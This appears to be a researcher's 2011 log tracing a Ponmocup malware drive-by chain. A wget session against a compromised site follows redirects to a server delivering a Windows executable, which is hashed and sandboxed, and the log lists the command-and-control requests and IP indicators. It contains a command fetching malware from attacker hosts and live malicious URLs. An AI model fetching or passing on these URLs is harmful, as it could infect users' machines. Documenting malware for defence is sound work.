For general info about the Ponmocup malware / botnet please see: http://www9.dyndns-server.com:8080/pub/botnet-links.html user@host:~$ wget -S -v --keep-session-cookies --save-cookies cookies-2 --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)" --referer="http://www.google.ch/search?hl=de&source=hp&biw=1259&bih=878&q=zucchero&oq=Zucchero&aq=0&aqi=g10&aql=&gs_sm=e&gs_upl=765l1858l0l5090l8l7l0l1l1l0l312l936l0.1.2.1l4" http://www.zucchero.it/ -O www.zucchero.it --2011-07-21 10:03:27-- http://www.zucchero.it/ Resolving www.zucchero.it... 62.149.229.247 Connecting to www.zucchero.it|62.149.229.247|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 302 Found Date: Thu, 21 Jul 2011 07:04:21 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: xccgtswgokoe=1; path=/; domain=www.zucchero.it; expires=Thu, 28-Jul-2011 07:04:21 GMT Location: http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=34870508&j=332&m=19b540f2afd8451f302e34672bf8529d&h=www.zucchero.it&u=/&q=&t=20110721090421 Content-Length: 435 Connection: close Content-Type: text/html; charset=iso-8859-1 Location: http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=34870508&j=332&m=19b540f2afd8451f302e34672bf8529d&h=www.zucchero.it&u=/&q=&t=20110721090421 [following] --2011-07-21 10:03:27-- http://thousandmilitary.com/cgi-bin/r.cgi?p=10003&i=34870508&j=332&m=19b540f2afd8451f302e34672bf8529d&h=www.zucchero.it&u=/&q=&t=20110721090421 Resolving thousandmilitary.com... 77.79.11.98 Connecting to thousandmilitary.com|77.79.11.98|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 302 Moved Temporarily Server: Apache/1.3.42 Date: Thu, 21 Jul 2011 08:04:21 GMT Connection: close Location: http://press7.therealityglove.com/se/3da19bea8f9c07b830cf18c78f96e5a0837015a0ab1369c39fd839c8e12c24202a98e7208b0cf3c131be558a742eb17f4a193ca6f463244bdad2e6bedadba63cdb1ca9/9bb8ed62/zucchero.com Location: http://press7.therealityglove.com/se/3da19bea8f9c07b830cf18c78f96e5a0837015a0ab1369c39fd839c8e12c24202a98e7208b0cf3c131be558a742eb17f4a193ca6f463244bdad2e6bedadba63cdb1ca9/9bb8ed62/zucchero.com [following] --2011-07-21 10:03:28-- http://press7.therealityglove.com/se/3da19bea8f9c07b830cf18c78f96e5a0837015a0ab1369c39fd839c8e12c24202a98e7208b0cf3c131be558a742eb17f4a193ca6f463244bdad2e6bedadba63cdb1ca9/9bb8ed62/zucchero.com Resolving press7.therealityglove.com... 95.168.177.142 Connecting to press7.therealityglove.com|95.168.177.142|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: Apache/1.3.42 Date: Thu, 21 Jul 2011 08:03:29 GMT Content-Type: application/x-msdownload Connection: close Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="zucchero.com" Content-Length: 208911 Content-Transfer-Encoding: binary Accept-Ranges: none Length: 208911 (204K) [application/x-msdownload] Saving to: "www.zucchero.it" 100%[====================================================================================================================>] 208,911 930K/s in 0.2s 2011-07-21 10:03:28 (930 KB/s) - "www.zucchero.it" saved [208911/208911] user@host:~$ mv www.zucchero.it zucchero.com user@host:~$ ls -l zucchero.com -rw-r--r-- 1 user group 208911 Jul 21 10:03 zucchero.com user@host:~$ file zucchero.com zucchero.com: PE32 executable for MS Windows (GUI) Intel 80386 32-bit user@host:~$ md5sum zucchero.com 1098b041b743fa06e276eca074042b3d zucchero.com http://www.threatexpert.com/report.aspx?md5=1098b041b743fa06e276eca074042b3d http://anubis.iseclab.org/?action=result&task_id=136d303b3e42c1ba49d4968a9aaf6b177 From ANUBIS:1028 to 78.159.100.32:80 - [surfacechicago.net] Request: GET /html/license_43EC922A3D0E1F403834ED406BA80F5A686E606DF596C71B1F47B22D93555C332C0C0719D7D5C142B8C2C3E65DCC50966E34BA8C4D56463B02F3FED9544A9D2924CF3F64589D6F1B3DBB7180E9738A11F3A7C664F6BC84AA1B5B4824A007F3FD85586DDE35D8DFD83C52EF01BB4FC51EFA610EB05E9F31AACE0A4CE3F93DAE4758E93775E2175873776B41C6B8B8E477551AC5DF821A2A30780101FAF813B0E0A5703F759B3C706981FD4A7869895157E39ED3AA844149D42318C1889EA4154625D988CD8E00FAE64FB6CD1A8B4980B2FDAA3A963707F0454AB9697C1861AC5B1A8A5B80C9A8349D67AA22D35E7D97A419B642773926FB9F0382AAFF9F800397340CD84A677BC8EBC7EB45D3F0981BF368EFFEE0FB69DCF5A74CC14D87B121909C9E0DC4C3931749D5EAFA2C4ED7B092B243D8B108A71EE3DEF4B8746CEB6E206AEFD02B3C597CD47922E8F6E838683FCEA3913E9AF0A2E60E16EB19488945AC32C1A70FC9D35E2118BD8AC58E48758F02155C623F2C41B97F46F5268E.html Response: 404 "Not Found" From ANUBIS:1029 to 78.159.100.32:80 - [surfacechicago.net] Request: GET /html/license_43EC922A3D0E1F403834ED406BA80F5A686E606DF596C71B1F47B22D93555C332C0C0719D7D5C142B8C2C3E65DCC50966E34BA8C4D56463B02F3FED9544A9D2924CF3F64589D6F1B3DBB7180E9738A11F3A7C664F6BC84AA1B5B4824A007F3FD85586DDE35D8DFD83C52EF01BB4FC51EFA610EB05E9F31AACE0A4CE3F93DAE4758E93775E2175873776B41C6B8B8E477551AC5DF821A2A30780101FAF813B0E0A5703F759B3C706981FD4A7869895157E39ED3AA844149D42318C1889EA4154625D988CD8E00FAE64FB6CD1A8B4980B2FDAA3A963707F0454AB9697C1861AC5B1A8A5B80C9A8349D67AA22D35E7D97A419B642773926FB9F0382AAFF9F800397340CD84A677BC8EBC7EB45D3F0981BF368EFFEE0FB69DCF5A74CC14D87B121909C9E0DC4C3931749D5EAFA2C4ED7B092B243D8B108A71EE3DEF4B8746CEB6E206AEFD02B3C597CD47922E8F6E838683FCEA3913E9AF0A2E60E16EB19488945AC32C1A70FC9D35E2118BD8AC58E48758F02155C623F2C41B97F46F5268E7DF1A9FF845B6FE5C78664883A160EF3A371521DEF2A02A7875F69F40613FDA1F08D65548AD5F3B9627B77C79D185EDC1E660DC48E9370469B168BDB8CB9162BE10288DE893B6CC2E9EA3BD423E0567187739147935B20B1DF88C24CF113B5016C16B4DB6D9102DDA54948F457C53C759469226108C049FBAFB164EBB106040E608D074AE447DA2B77452DE4867508F04EC10B89E891CFF3E18D54C6E6F820FABBF45B142434D3651F8F9BB14A5E1AFEF6047E717598A99F7F2852D8F81E3E35B13881C275013B9EAA2AAB51E9C4EA5955140664EC52EEC0B4803FD4A028FEBC7E7B669D6D471F5E8D0FB236FF5B3CBB58F906E6097670D715E166D7D3A5.html Response: 404 "Not Found" thousandmilitary.com 77.79.11.98 press7.therealityglove.com 95.168.177.142 surfacechicago.net 78.159.100.32